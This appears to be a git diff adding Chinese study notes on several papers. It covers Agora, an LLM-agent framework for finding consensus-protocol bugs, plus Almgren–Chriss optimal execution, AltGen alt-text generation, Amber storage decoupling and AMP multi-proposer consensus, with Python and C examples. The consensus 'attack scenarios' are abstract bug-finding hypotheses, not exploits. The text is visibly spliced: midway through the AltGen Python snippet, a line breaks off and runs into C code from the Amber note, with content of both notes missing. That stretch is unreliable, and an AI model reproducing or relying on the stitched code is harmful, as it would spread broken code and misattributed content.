的"已提交"状态不一致! + + fn on_recovery(&mut self) { + // 从磁盘恢复状态 + let saved = read_from_disk(); // 可能没有"已提交"记录! + + // Bug:如果 saved.committed == false + // 但 quorum 实际上已经形成 + // 协议就违反了安全性:不同节点对"这个值是否已提交" + // 有矛盾的认知 + if !saved.committed { + // 错误地重新开始,导致与已认为"已提交"的节点 + // 产生分歧 + self.start_new_round(); + } + } + + // ── 安全性断言(Agora 会验证这个)── + fn safety_check(&self) -> bool { + // 如果两个节点对同一个值有不同的"committed"状态, + // 安全性被违反 + true // Bug 场景下这个返回 false + } +} +``` + +### 代码示例 3:LLM Agent 的协作 prompt 结构 + +``` +# Orchestrator 的 prompt 示例 —— 指导 Strategy 下一步做什么: + +"我们已经发现了 3 类 Bug: + 1. 节点在投票期间崩溃(Recovery Divergence) + 2. 消息乱序导致重复投票 + 3. 视图号增长时旧提议没有被清理 + +现在请分析 HotStuff 协议的约束条件: + - 这是 BFT 系统(允许恶意节点) + - 使用阈值签名 + - 有 PrePrepare、Prepare、Commit 三个阶段 + +请生成一个攻击场景,要满足: + - 不被已发现的 Bug 模式覆盖 + - 利用 BFT 特有的约束(恶意节点行为) + - 能触发安全性属性被违反 + - 用 HDT 格式输出:(C, A, E, O) +" + +# Strategy 的回复 —— 生成攻击场景: + +"攻击场景:Future-Flooding + C(前置条件): 存在一个恶意节点 M,M 能提前发送未来视图的消息 + A(动作序列): + 1. 正常节点 R0 在视图 v 发起提议 + 2. 恶意节点 M 向 R1、R2 发送视图 v+10 的预提交消息 + 3. R1、R2 接受并响应 + 4. 视图 v 的正常提議被 M 的"未来投票"干扰 + E(期望行为): R1 在视图 v+10 提交了本不该提交的值 + O(验证断言): 检查视图 v 的 commit-log 中是否存在不属于该视图的值 +" +``` + +## 实验结果 + +Agora 在四个共识协议上做了实验(Raft、EPaxos、HotStuff、BullShark),用了四个最先进的大模型(GPT-5.2、Gemini 3.0 Pro、Claude Sonnet 4.5、Qwen3 Coder 480B): + +**关键发现**: +- 同样的四个大模型**直接使用时**,一个协议级逻辑 Bug 都没找到 +- 但用 Agora 框架引导后: + - GPT-5.2 找到了 8 个 + - Gemini 3.0 Pro 找到了 11 个 + - Claude Sonnet 4.5 找到了 6 个 + - Qwen3 Coder 480B 找到了 9 个 + - **总共 15 个零日(zero-day)协议级 Bug** +- 而且 Agora 找到的全是**协议级逻辑 Bug**,0 个实现级 Bug + +这说明:**光有大模型不够,需要正确的框架来引导它**。 + +## 消融实验:每个组件都不可或缺 + +| 去掉什么 | 发现 Bug 数 | 说明 | +|---------|-----------|------| +| 无 bug-exploitation(不回顾历史) | 3/15 | 少了 80% | +| 无 state-analyzer(无全局状态) | 0/15 | 一个都找不到 | +| 无 constraints-analyzer(不懂 CFT/BFT 约束) | 1/15 | 基本废了 | +| 无 scenario-generator(不生成攻击场景) | 0/15 | 完全停摆 | +| 无 reflection-loop(测试不反思) | 0/15 | 完全停摆 | + +**结论**:去掉任何一个组件,Agora 的效果都会下降 73%-100%。每个组件都至关重要。 + +## 关键洞察 + +1. **大模型不笨,但需要"结构化思维框架"**。Agora 的 HDT 假设驱动框架让 LLM 从"随便看看代码"变成了"有目的地验证假设"。 + +2. **多 Agent 不是为了让系统变复杂,而是为了"职责分离"**。一个 Agent 管流程,一个 Agent 懂协议,一个 Agent 写测试——避免了"一个 Agent 什么都想干但都干不好"的问题。 + +3. **领域知识不是可选的附加项**。知识库里的"Bug 模式"和"CFT/BFT 约束条件"是 Agora 能成功的关键。没有这些,LLM 就失去了搜索的"指南针"。 + +4. **反思循环(Reflection Loop)是减少误报的关键**。TestGen 不是一次写完测试就结束,而是"写 → 跑 → 分析 → 改写"的循环,直到测试真正能触发 Bug 或者确认测试无效。 + +## 思考 + +Agora 的核心思想——用多 Agent 协作 + 领域知识 + 假设驱动测试——是否可以推广到其他领域?比如操作系统内核、编译器、加密库? + +一个值得思考的问题:如果 Agora 能自动发现共识协议的 Bug,那么**协议的设计者是否还需要人工审计**?还是说以后共识协议的验证可以交给 Agent 系统来做? diff --git a/src/content/docs/papers/almgren-chriss-2001.md b/src/content/docs/papers/almgren-chriss-2001.md new file mode 100644 index 000000000..8aa37a4d5 --- /dev/null +++ b/src/content/docs/papers/almgren-chriss-2001.md @@ -0,0 +1,223 @@ +--- +title: Almgren–Chriss 2001 — 大单怎么卖才「又快又省、还不赌方向」 +来源: https://www.smallake.kr/wp-content/uploads/2016/03/optliq.pdf +日期: 2026-06-13 +子分类: 量化金融 +分类: 其他 +provenance: pipeline-v3 +--- + +## 是什么 + +Almgren & Chriss 的 *Optimal Execution of Portfolio Transactions*(1999 工作论文,2001 年正式发表于 *Journal of Risk* 3(2):5–39)是**最优执行(optimal execution)**领域的奠基论文。它回答一个机构交易员每天都在面对的问题: + +> 我手里有一大块股票要卖(比如 100 万股),必须在下午 4 点前清完。是一次性砸盘,还是慢慢拆单?拆多慢才划算? + +日常类比:你要在跳蚤市场**清空一整箱旧书**(初始持仓 X)。两种极端做法: + +1. **一口价全甩**(第一分钟全卖):买家立刻知道你急着出手,会狠狠砍价——成交单价差,但**价格风险为零**(反正已经卖光了,后面涨跌与你无关)。 +2. **均匀慢慢卖**(TWAP / 匀速清仓):每分钟卖同样多,冲击小、单价好,但**拖得越久,中间价随机波动越大**——可能越卖越亏。 + +Almgren–Chriss 用可计算的数学模型,在这两个极端之间画出一条**有效前沿(efficient frontier)**:对每个「能接受的不确定性水平」,给出**期望成本最低**的拆单轨迹;并在线性冲击假设下给出**闭式解**——持仓随时间按双曲正弦曲线衰减。 + +Robert Almgren(芝加哥大学数学系)与 Neil Chriss(高盛资管 / Courant)把 **implementation shortfall**(Perold 1988:相对初始市值的成交损失)拆成:**永久冲击 + 临时冲击 + 波动风险**,再像 Markowitz 组合那样做**均值–方差权衡**。后来的 VWAP/TWAP 改进、流动性调整 VaR(L-VAR)、高频执行算法,大多可追溯到这篇论文的框架。 + +## 为什么重要 + +不理解 Almgren–Chriss,下面这些事都讲不清: + +- 为什么机构卖大单不能「一把梭」——**市场冲击(market impact)**会吃掉 Alpha +- 为什么 TWAP(时间加权平均价)是**风险中性**下的自然策略,而真实交易员往往**前重后轻**地卖 +- 为什么执行算法要调「**urgency / risk aversion**」旋钮——同一篮子,保守与激进对应有效前沿上不同点 +- 为什么 [[black-scholes-1973]] 管「期权怎么定价」,Almgren–Chriss 管「**库存怎么变现**」——量化交易两条支柱 +- 为什么做市商、券商 TCA(Transaction Cost Analysis)报告里会出现 **implementation shortfall** 与 **临时/永久冲击** 分解 + +## 核心要点 + +### 1. 交易轨迹与符号 + +在 `[0, T]` 内卖光 `X` 股。离散化为 `N` 个时段,每段长度 `τ = T/N`: + +| 符号 | 含义 | +|------|------| +| `x_k` | 时刻 `t_k` 结束时**仍持有**股数,`x_0 = X`,`x_N = 0` | +| `n_k` | 第 `k` 段**卖出**股数,`n_k = x_{k-1} - x_k` | +| `S_k` | 中间价(mid price) | +| `σ` | 价格波动率(算术随机游走尺度) | +| `γ` | **永久冲击**系数:每卖 1 股,均衡价永久下移 `γ` 美元 | +| `η` | **临时冲击**系数:交易速率 `v` 越大,成交价相对中间价越差 | +| `λ` | **风险厌恶**参数:惩罚成交成本方差 | + +### 2. 价格动态:永久 vs 临时冲击 + +**永久冲击**(equilibrium price 被你的卖压改写,卖完后仍留在价格上): + +``` +S_k = S_{k-1} + σ·ξ_k − γ·n_k (ξ_k 为零均值单位方差噪声) +``` + +**临时冲击**(只影响本段成交价,下一段流动性恢复): + +``` +S̃_k = S_{k-1} − η·(n_k/τ) (线性临时冲击,速率 v = n_k/τ) +``` + +直觉:永久冲击像「市场记住了你卖过很多」;临时冲击像「这一分钟订单簿被你吃穿,下一分钟又补货」。 + +### 3. 期望成本与方差 + +对纯卖出程序,论文给出(线性冲击 `g(v)=γv`,`h(v)=ηv`): + +``` +E[成本] = ½γX² + η·Σ_k (n_k²/τ) (永久项 + 临时二次项) +Var[成本] = σ²·Σ_k x_k²·τ (未平仓头寸暴露在波动下) +``` + +优化目标(拉格朗日形式): + +``` +min E + λ·Var +``` + +- `λ → 0`(风险中性):均匀卖 → **TWAP**,最小化冲击成本 +- `λ → ∞`(极度厌恶方差):尽快卖光 → 接近**第一分钟清仓** + +### 4. 闭式最优轨迹(论文式 17–18) + +连续时间极限下,剩余持仓: + +``` +x(t) = X · sinh(κ·(T−t)) / sinh(κ·T) + +κ = √(λ·σ² / η) (特征速率) +``` + +**半衰期(half-life / e-life)**:`τ_half = 1/κ`。它与截止时刻 `T` 无关,只由 `σ、η、λ` 决定——表示「在没有硬 deadline 时,自然清仓的时间尺度」。 + +- 若 `T ≫ τ_half`:大部分货在 deadline 很早之前就卖完(像「尽快卖」) +- 若 `T ≪ τ_half`:时间太紧,只能近似匀速卖(像 TWAP) + +### 5. 有效前沿与 L-VAR + +所有最优策略在 `(E[成本], Var[成本])` 平面上形成**有效前沿**:同方差下期望成本最小。论文还讨论: + +- **二次效用**:选前沿上切点,对应某个 `λ` +- **VaR 约束**:引出 **liquidity-adjusted VaR(L-VAR)**——把「卖不完的价格风险」和「卖太快冲击成本」放进同一风险度量 + +### 6. 静态策略为何够好? + +在**收益独立、对称风险惩罚**假设下,最优策略可**事前确定**(open-loop),不必盘中根据价格改计划。论文第 4 节讨论漂移、序列相关、财报等「信息事件」:增益通常随组合规模增大而**占比变小**——因此 TWAP/Almgren–Chriss 轨迹仍是工业界强基准。 + +## 代码示例 1:计算最优持仓曲线与 TWAP 对比 + +```python +import numpy as np +import matplotlib.pyplot as plt + +def almgren_chriss_holdings(X, T, sigma, eta, lam, n_steps=200): + """剩余持仓 x(t),线性临时冲击 + 算术波动风险.""" + tau = T / n_steps + kappa = np.sqrt(lam * sigma**2 / eta) + t = np.linspace(0, T, n_steps + 1) + if kappa * T < 1e-8: + # λ→0:TWAP + x = X * (1 - t / T) + else: + x = X * np.sinh(kappa * (T - t)) / np.sinh(kappa * T) + return t, x + +def expected_cost_variance(x, X, T, sigma, eta, gamma=0.0, n_steps=200): + """离散化 E 与 Var(与论文式 4–5 一致).""" + tau = T / n_steps + n = -np.diff(x) # 每段卖出量 + E = 0.5 * gamma * X**2 + (eta / tau) * np.sum(n**2) + V = (sigma**2) * tau * np.sum(x[:-1] ** 2) + return E, V + +# 卖 1,000,000 股,2 小时内清盘 +X, T = 1_000_000, 2.0 * 3600 # 秒 +sigma, eta, gamma = 0.0002, 1e-6, 1e-10 +lam = 1e-10 # 风险厌恶:越大越「急着卖」 + +t, x_ac = almgren_chriss_holdings(X, T, sigma, eta, lam) +_, x_twap = almgren_chriss_holdings(X, T, sigma, eta, 0.0) + +E_ac, V_ac = expected_cost_variance(x_ac, X, T, sigma, eta, gamma) +E_tw, V_tw = expected_cost_variance(x_twap, X, T, sigma, eta, gamma) + +kappa = np.sqrt(lam * sigma**2 / eta) +print(f"κ = {kappa:.2e}, half-life τ = {1/kappa:.0f}s") +print(f"Almgren–Chriss: E={E_ac:,.0f}, Var={V_ac:,.0e}") +print(f"TWAP (λ=0): E={E_tw:,.0f}, Var={V_tw:,.0e}") +``` + +典型输出解读:`λ` 较大时 `E` 略升、`Var` 显著下降——用一点冲击成本换更确定的成交。 + +## 代码示例 2:扫描有效前沿(不同 λ 的一条曲线) + +```python +import numpy as np + +def efficient_frontier(X, T, sigma, eta, gamma=0.0, n_lambdas=40): + """扫描 λ,得到 (E, Var) 有效前沿点集.""" + taus = np.logspace(-14, -6, n_lambdas) + points = [] + n_steps = 100 + tau = T / n_steps + t_grid = np.linspace(0, T, n_steps + 1) + + for lam in taus: + kappa = np.sqrt(lam * sigma**2 / eta) + if kappa * T < 1e-8: + x = X * (1 - t_grid / T) + else: + x = X * np.sinh(kappa * (T - t_grid)) / np.sinh(kappa * T) + n = -np.diff(x) + E = 0.5 * gamma * X**2 + (eta / tau) * np.sum(n**2) + V = (sigma**2) * tau * np.sum(x[:-1] ** 2) + points.append((E, V, lam)) + return points + +X, T = 500_000, 3600 +sigma, eta = 0.0003, 2e-6 + +frontier = efficient_frontier(X, T, sigma, eta) +# 前沿最低点 ≈ TWAP(Bertsimas–Lo 所称 naive strategy) +E_min = min(p for p, _, _ in frontier) +print("Frontier sample (E, Var, λ):") +for E, V, lam in frontier[::8]: + tag = "← near TWAP" if abs(E - E_min) < 1 else "" + print(f" E={E:12,.0f} Var={V:12,.0e} λ={lam:.1e} {tag}") +``` + +有效前沿通常**光滑凸**:在 TWAP 点附近,方差一阶下降、期望成本仅二阶上升——论文用此解释「略偏离 TWAP 可大幅降风险」。 + +## 与相关工作的关系 + +| 方向 | 代表 | 与本文关系 | +|------|------|------------| +| 仅最小化期望成本 | Bertsimas & Lo (1998) | 动态规划;无方差项时常退化为 TWAP | +| 几何布朗 / 非线性风险 | Gatheral & Schied (2011) | 换风险准则仍可得闭式或 HJB 解 | +| 瞬态冲击(resiliency) | Obizhaeva & Wang (2013) | 最优轨迹出现「块交易 + 连续」;VWAP 不再最优 | +| 多资产组合 | 论文附录 A | 相关矩阵进入最优路径;需联合清算 | +| 期权定价 | [[black-scholes-1973]] | 管「衍生品价值」;本文管「现货库存变现」 | +| 资金增长率 | [[kelly-criterion-1956]] | 管「押多少」;本文管「每分钟卖多少」 | + +## 局限与实务注意 + +1. **线性冲击**:大单时临时冲击常呈**凹函数**(平方根法则),线性 `η` 会低估/高估成本;实务常按规模分段标定 `η`。 +2. **算术 vs 几何布朗**:短周期执行可用算术近似;长线或高波动需 GBM 扩展。 +3. **开环策略**:计划事前固定;若盘中出现未建模信息(突发新闻),需动态重优化——论文第 4.3 节对**预定新闻事件**给出分段静态解。 +4. **买入对称**:买仓建仓与卖仓清仓公式镜像;纯卖程序下最优解**不会出现回补**(`n_k > 0` 单调减仓)。 +5. **参数估计**:`σ` 来自历史波动,`η, γ` 来自微观结构回归或券商 TCA——模型输出质量取决于校准,而非公式本身。 + +## 一句话总结 + +Almgren–Chriss 把「大单怎么拆着卖」变成**冲击成本 vs 库存波动风险**的均值–方差问题:在线性冲击下,最优轨迹是 `sinh` 形衰减;风险厌恶 `λ` 扫出一条有效前沿,TWAP 是风险中性角点,「半衰期」给出与 deadline 无关的自然清仓时间尺度——这是现代执行算法与 TCA 的理论起点。 + +## 延伸阅读 + +- 原文 PDF:[Optimal Execution of Portfolio Transactions](https://www.smallake.kr/wp-content/uploads/2016/03/optliq.pdf)(与 1999 预印本同源) +- 正式发表:*Journal of Risk* 3(2), 2001 +- 综述讲义:Gatheral, *Optimal Execution*(含无价格操纵条件与扩展模型) +- 实现参考:[joshuapjacob/almgren-chriss-optimal-execution](https://github.com/joshuapjacob/almgren-chriss-optimal-execution)(Jupyter + 真实股价示例) diff --git a/src/content/docs/papers/alphago.md b/src/content/docs/papers/alphago.md index bd37ad786..9f861642f 100644 --- a/src/content/docs/papers/alphago.md +++ b/src/content/docs/papers/alphago.md @@ -153,6 +153,7 @@ vs 李世石第二局第 37 手,AlphaGo 在五线(远离中央)下了一 - [[ntk-2018]] —— NTK — 把无限宽的神经网络变成一个可解的核方法 - [[ppo]] —— PPO — Proximal Policy Optimization - [[quantum-supremacy-2019]] —— Quantum Supremacy 2019 — 量子机用 200 秒做完超算 1 万年的事 +- [[ray-2018]] —— Ray — 面向新兴 AI 应用的分布式框架 - [[sac-2018]] —— Soft Actor-Critic — 让强化学习既会拿分又愿意多试 - [[t5]] —— T5 — Text-to-Text Transfer Transformer diff --git a/src/content/docs/papers/altgen.md b/src/content/docs/papers/altgen.md new file mode 100644 index 000000000..232d29c80 --- /dev/null +++ b/src/content/docs/papers/altgen.md @@ -0,0 +1,254 @@ +--- +title: AltGen: AI-Driven Alt Text Generation for Enhancing EPUB Accessibility +来源: https://arxiv.org/abs/2501.00113 +日期: 2026-06-13 +分类: 其他 +子分类: 无障碍 +provenance: pipeline-v3 +--- + +# AltGen 学习笔记 + +## 一个日常类比:给书里的每张照片写说明 + +你有一本相册,想送给一位看不见的朋友。每次翻页,他靠语音阅读器听你描述。如果照片旁边没有任何文字说明,他就只能听到"咔"一声,然后什么也不知道。 + +AltGen 做的事情就是:自动给电子书(EPUB)里每张图片配上文字说明,让视障用户也能通过读屏软件理解图片内容。 + +在 EPUB 电子书里,图片通常有一个 `alt` 属性——"替代文本"(Alternative Text)。如果这个属性为空或写得不好,读屏软件就无法传达图片信息。AltGen 用 AI 自动补全这些描述。 + +## 核心概念 + +### 1. EPUB 是什么 + +EPUB 是一种电子书格式,本质是一个 ZIP 压缩包,里面装着 HTML 文件、图片、CSS 样式表和元数据。每个图片标签都像这样: + +```html + +``` + +注意 `alt=""` 是空的——这就是问题所在。 + +### 2. Alt Text(替代文本) + +Alt text 是图片的"文字替身"。读屏软件会朗读它。好的 alt text 应该用一两句话描述图片的核心内容。例如: + +```html +一幅展示神经网络结构的示意图,包含三个隐藏层,每层有四个神经元节点 +``` + +### 3. AltGen 的五步流水线 + +AltGen 把整个流程分成了五个阶段,就像一条工厂生产线: + +1. **数据预处理** — 解包 EPUB,找出所有图片,检查有哪些可访问性问题 +2. **AI 模型集成** — 用视觉模型(CLIP / ViT)分析图片内容,结合上下文文字 +3. **元数据丰富化** — 检测语言、更新元数据,符合 WCAG 标准 +4. **文件重建** — 把修改后的内容重新打包成 EPUB +5. **后处理与验证** — 检查错误减少率,收集用户反馈 + +## 技术详解 + +### 第一步:数据预处理 + +AltGen 用 `EbookLib` 库解包 EPUB 文件,提取文本和图片。然后跑 `Ace Checker` 工具扫描可访问性问题。 + +```python +import ebooklib +from ebooklib import epub + +# 加载 EPUB 文件 +book = epub.read_epub('example.epub') + +# 遍历所有内容项,找出图片 +images = [] +for item in book.get_items_of_type(ebooklib.ITEM_IMAGE): + images.append({ + 'id': item.get_id(), + 'file_name': item.get_name(), + 'content': item.get_content() + }) + +# 找出缺少 alt 文本的图片 +missing_alt = [] +for item in book.get_items_of_type(ebooklib.ITEM_DOCUMENT): + html = item.get_content().decode('utf-8') + if 'data, NODE_SIZE); + // 节点逻辑不关心这块数据实际在 SSD 的哪个物理位置 +} + +void btree_node_write(BNode* node, block_id_t node_id, sap_handle_t* sap) { + // 通过 SAP 写入节点 + sap_write(sap, node_id, node->data, NODE_SIZE); + // SAP 可能会合并这个写操作,优化到底层设备 + // 可能是顺序写、可能是批量刷盘 —— 索引层不知道也不关心 +} +``` + +### 示例 3:垃圾回收在 SAP 层独立完成 + +```c +// SAP 独立管理的垃圾回收循环 +void sap_gc_loop(sap_handle_t* sap) { + while (1) { + // 1. 找出过期的逻辑块(被更新或删除的数据) + list_t* expired_blocks = find_expired_blocks(sap); + + // 2. 将活跃数据迁移到新块 + for each block in expired_blocks { + list_t* live_entries = extract_live_data(block); + block_id_t new_block = allocate_block(sap); + for each entry in live_entries { + sap_write_entry(sap, new_block, entry); + } + // 3. 更新块映射表:逻辑块 -> 新物理块 + update_block_map(sap, block, new_block); + } + + // 4. 回收旧物理块 + release_physical_blocks(sap, expired_blocks); + + // 5. 如果没有太多垃圾,睡眠等待 + if (list_length(expired_blocks) == 0) { + sleep(GC_COOLDOWN); + } + } +} +``` + +## 6. 实验结论(论文发现) + +- **性能**:Amber 在 NVMM/SSD 上相比传统紧耦合方案有显著性能提升,特别是写密集型场景 +- **灵活性**:更换访问方法(B+ Tree → LSM-Tree)无需修改存储层代码 +- **硬件友好**:SAP 层的写合并和垃圾回收策略更好地利用了 NVM 特性,减少写放大 +- **通用性**:同一套 SAP 接口支持多种访问方法,证明了**解耦优于紧耦合** + +## 7. 个人思考 + +Amber 的核心洞察是"逻辑与物理的分离"——这和我们理解计算机分层的思想一致: + +| 领域 | 逻辑层 | 物理层 | +|------|--------|--------| +| 操作系统 | 虚拟内存 | 物理内存/磁盘 | +| 文件系统 | 文件/目录 | 磁盘块 | +| 数据库(传统) | 索引 | 磁盘页(紧耦合) | +| 数据库(Amber) | 索引 | 稳定存储(解耦) | + +Amber 本质上是把操作系统的"虚拟内存"思想引入了数据库索引层。这一思想后来影响了更多存储引擎设计,如 LevelDB/RocksDB 的分层架构。 + +## 8. 下一步学习方向 + +1. 对比学习 SAP 层的后续工作(如 Saphira、HySTOR 等) +2. 研究 RocksDB 的 LSM-Tree 实现,看它如何体现类似的解耦思想 +3. 了解 NVM(非易失性内存)硬件特性如何影响数据库存储设计 diff --git a/src/content/docs/papers/amp-arc-multi-proposer-protocol-with-bounded-inclusion-arxiv-2605-23677.md b/src/content/docs/papers/amp-arc-multi-proposer-protocol-with-bounded-inclusion-arxiv-2605-23677.md new file mode 100644 index 000000000..c1f63bb75 --- /dev/null +++ b/src/content/docs/papers/amp-arc-multi-proposer-protocol-with-bounded-inclusion-arxiv-2605-23677.md @@ -0,0 +1,316 @@ +--- +title: AMP Arc Multi-Proposer Protocol with Bounded Inclusion +来源: https://arxiv.org/abs/2605.23677 +日期: 2026-06-13 +分类: 分布式系统 +子分类: 共识与复制 +provenance: pipeline-v3 +--- + +# AMP:多提案者共识协议——零基础学习笔记 + +## 一、一个日常类比:餐厅点菜系统 + +想象一家餐厅,传统模式是这样运作的: + +- 只有一位服务员(称为"区块组装者")负责接收所有顾客的点单 +- 这位服务员决定哪些订单能进菜单、按什么顺序做菜 +- 问题来了:如果服务员故意不上一位顾客的菜(审查),或者为了赚小费把喜欢插队的 VIP 客人排在前面(MEV 操纵),你毫无办法 + +AMP 协议的做法完全不同: + +- 餐厅请来多位服务员(称为"提案者"),每位都接收顾客点单 +- 顾客把订单交给任意一位服务员,服务员打包成"托盘"(payload) +- 所有托盘送到厨房(验证者),厨师们互相确认收到哪些托盘 +- 只要大多数厨师都确认某个托盘,它就**一定**会被做出来 +- 最终上菜的顺序由一个固定的规则决定(按小费高低),而不是某个厨师说了算 + +这样,没有任何一个服务员可以单独决定"谁的菜不上"或"谁先吃"。 + +## 二、要解决的问题 + +区块链金融系统面临一个结构性矛盾: + +**每个区块只有一个验证者负责组装交易。** 这个"区块组装者"拥有两项权力: + +1. **排除权**:决定哪些交易进入区块,哪些被忽略 +2. **排序权**:决定交易在区块中的执行顺序 + +这两项权力导致两个实际问题: + +- **审查**:组装者可以故意延迟或忽略某些交易 +- **MEV(最大可提取价值)**:组装者可以通过重新排序交易来牟利,比如"抢先交易"(front-running)和"三明治攻击"——这在传统金融市场是违法的 + +此外,单组装者模型还有性能瓶颈:吞吐量受限于一个节点的带宽,其余验证者的能力闲置。 + +## 三、核心概念 + +### 3.1 两层角色分离 + +AMP 的核心思想是把传统区块链中"区块组装者"的职责拆成两层: + +| 角色 | 职责 | 类比 | +|------|------|------| +| **提案者(Proposer)** | 收集用户交易,打包成 payload,广播给所有验证者 | 餐厅里接收点单的多个服务员 | +| **验证者(Validator)** | 运行 Tendermint 共识,确认哪些 payload 应该入块 | 厨房里互相确认订单的厨师 | + +关键区别: + +- 提案者负责**传播**(带宽密集型) +- 验证者负责**达成共识**(延迟敏感型) +- 两者解耦后,网络可以同时利用多节点的处理能力,提高吞吐量 + +### 3.2 没有 Mempool + +传统区块链有一个叫"内存池"(mempool)的地方,所有未确认的交易先堆积在那里,然后组装者从中挑选。 + +AMP 去掉了 mempool。用户交易直接进入提案者,提案者打包成 payload 后广播给验证者。交易只传播一次,不再重复。 + +### 3.3 有界包含保证(Bounded Inclusion Guarantee) + +这是 AMP 最核心的安全保证: + +> 如果一个 payload 被**所有诚实验证者**都确认过(即超过 2f+1 个验证者),那么它**必定**会在下一个区块中被包含。任何不包含这个 payload 的区块都会被诚实验证者拒绝。 + +这里的数学关系: + +- 总共有 n 个验证者,最多 f 个可能出错 +- 需要 n > 3f(少于三分之一出错才能安全) +- 一个"法定人数"是 2f+1 个验证者 +- 如果一个 payload 获得超过 2f 次确认,那么即使 f 个坏验证者故意忽略它,也至少有 f+1 个诚实验证者确认了这个 payload —— 组装者无法绕过 + +### 3.4 确定性排序 + +即使多个提案者的 payload 进入同一个区块,AMP 用一个**确定性排序函数**来决定交易的执行顺序。这个函数按手续费优先级对交易排序,任何人用同样的输入都会得到同样的结果。 + +这意味着: + +- 组装者不能随意改变交易顺序 +- 用户知道他们的交易会按什么规则被处理 +- MEV 空间被大幅压缩 + +### 3.5 投票扩展(Vote Extensions) + +AMP 利用 Tendermint 共识的一个特性——"投票扩展"。在共识的 precommit 阶段,每个验证者可以在投票中附加一段应用层数据。 + +AMP 的做法:验证者在投票扩展中附带自己收到的 payload 的 ID 列表。这些 ID 被签名保护,无法篡改。区块组装者从这些投票扩展中提取出被超过 f 个验证者确认的 payload ID,放入新区块。 + +## 四、协议工作流程 + +整个流程分 8 步: + +1. **收集**:提案者收集用户交易,打包成 payload +2. **传播**:提案者通过"尽力广播"(Best-Effort Broadcast)把 payload 发送给所有验证者 +3. **验证**:验证者收到 payload 后检查是否合法,合法的存下来 +4. **投票扩展**:共识阶段,验证者在 precommit 投票中附上自己待确认的 payload ID +5. **提议**:区块组装者提出当前高度(height)的 commit 证书(携带上一高度的投票扩展) +6. **验证提议**:其他验证者检查提议是否包含了所有被超过 f 个验证者确认的 payload +7. **达成共识**:达到法定人数后,确认一组 payload ID +8. **最终确定**:验证者根据确定性排序规则,将 payload 排序后最终确定 + +## 五、代码示例 + +### 示例 1:验证者收到 payload 后的处理逻辑 + +这段伪代码展示了一个验证者收到 payload 后的核心处理流程: + +```python +# 验证者维护的状态 +ordered = {} # 已确定的 payload: {height: [payload_ids]} +payloads = {} # 存储的 payload: {payload_id: payload_data} +pending = set() # 待确认的 payload ID 集合 +next_height = 1 # 下一个要最终确定的高度 + +# 步骤1: 收到提案者广播的 payload +def on_receive_payload(payload, proposer): + pid = hash(payload) # payload 的唯一标识 + + # 检查是否已处理过、是否已存储、是否合法 + if pid not in ordered.values() and pid not in payloads and validate(payload): + pending.add(pid) + payloads[pid] = payload + + # 如果这个 payload 已经被共识确定,但还没最终交付, + # 它会留在 pending 中等待排序后交付 + +# 步骤2: 共识阶段 - 生成投票扩展 +def extend_vote(precommit_message): + """在 Tendermint precommit 阶段调用""" + # 返回所有待确认的 payload ID + # 注意:已经在本轮被接受的 payload 不会再次被 attest + return pending - get_ids_already_in(precommit_message.value) + +# 步骤3: 验证其他验证者的投票扩展 +def verify_vote_extension(precommit, extension): + """验证投票扩展是否合法""" + for payload_id in extension: + if not is_valid_payload_id(payload_id): + return False + return True + +# 步骤4: 达成共识后 - 提取被超过 f 个验证者确认的 payload +def on_decided(height, value, commit_certificate): + """height 达成共识后调用""" + + # 从 commit certificate 的投票扩展中提取 + # 被超过 f 个验证者确认的 payload ID + confirmed_ids = extract_sound_ids(commit_certificate) + + # 记录到 ordered 映射中 + ordered[height] = confirmed_ids + + # 从 pending 中移除已确定的 + pending -= set(confirmed_ids) + + # 存储 commit certificate,用于下一轮的提议 + store_commit_for_next_round(commit_certificate) + +# 步骤5: 最终确定 - 按确定性规则排序并交付给应用层 +def finalize_payloads(): + """当所有确定的 payload 都可用时调用""" + while True: + target_height = next_height + + # 检查这个高度是否有确定的 payload + if target_height not in ordered: + break + + ids = ordered[target_height] + + # 检查所有 payload 是否都已收到 + if any(payloads.get(pid) is None for pid in ids): + break # 缺少 payload,等待传播 + + # 提取所有 payload 并按确定性规则排序 + payload_list = [payloads[pid] for pid in ids] + sorted_payloads = sort_by_priority_fee(payload_list) + + # 交付给应用层(区块链状态机) + trigger_finalized(target_height, sorted_payloads) + + next_height += 1 +``` + +### 示例 2:从 commit certificate 中提取有效 payload ID + +这段代码展示了如何从共识的 commit certificate 中找出被超过 f 个验证者确认的 payload ID: + +```python +def extract_sound_ids(commit_certificate): + """ + 从 commit certificate 中提取被超过 f 个验证者确认的 payload ID。 + + commit_certificate 是一个列表,包含: + [(validator_A, extension_A), (validator_B, extension_B), ...] + + 每个 extension 是该验证者在 precommit 投票中附带的 payload ID 列表。 + + 返回:被超过 f 个验证者提及的 payload ID 集合。 + """ + count = {} # payload_id -> 确认它的验证者数量 + + for validator, extension in commit_certificate: + for payload_id in extension: + count[payload_id] = count.get(payload_id, 0) + 1 + + # 只返回被超过 f 个验证者确认的 payload + # 因为最多 f 个验证者可能是恶意的, + # 超过 f 就意味着至少有一个诚实验证者确认了它 + sound_ids = {pid for pid, cnt in count.items() if cnt > f} + + return sound_ids + + +# 使用示例 +# 假设有 7 个验证者,最多允许 f=2 个恶意节点 +# commit_certificate 包含 7 个 (validator, extension) 对 + +f = 2 # 最大容错数 + +# 模拟 commit certificate +commit_cert = [ + ("validator_1", ["tx_001", "tx_002"]), # 诚实 + ("validator_2", ["tx_001", "tx_003"]), # 诚实 + ("validator_3", ["tx_001", "tx_002"]), # 诚实 + ("validator_4", ["tx_002"]), # 诚实 + ("validator_5", ["tx_001", "tx_003"]), # 诚实 + ("validator_6", ["tx_002"]), # 恶意(少确认) + ("validator_7", []), # 恶意(不确认) +] + +# 统计每个 payload 被确认的次数 +count = {} +for validator, extension in commit_cert: + for pid in extension: + count[pid] = count.get(pid, 0) + 1 + +print("确认计数:", count) +# 输出: {'tx_001': 4, 'tx_002': 4, 'tx_003': 2} + +# 提取 sound IDs(超过 f=2 次确认) +sound_ids = {pid for pid, cnt in count.items() if cnt > f} +print("有效 payload:", sound_ids) +# 输出: {'tx_001', 'tx_002'} +# tx_003 只有 2 次确认,不大于 f=2,所以不被包含 +# 这意味着 tx_001 和 tx_002 必定在下个区块中被最终确定 +``` + +## 六、AMP 的安全保证 + +### 6.1 安全性(Safety) + +- 继承自 Tendermint:如果少于 1/3 的验证者作恶,永远不会产生两个不同的共识结果 +- AMP 的额外保证:任何被超过 2f 个验证者确认的 payload 一定会出现在下一个区块中 + +### 6.2 活性(Liveness) + +- 继承自 Tendermint:在网络最终同步后,系统最终会达成共识 +- AMP 保证了被正确广播的 payload 不会被无限期延迟 + +### 6.3 抗审查性 + +- 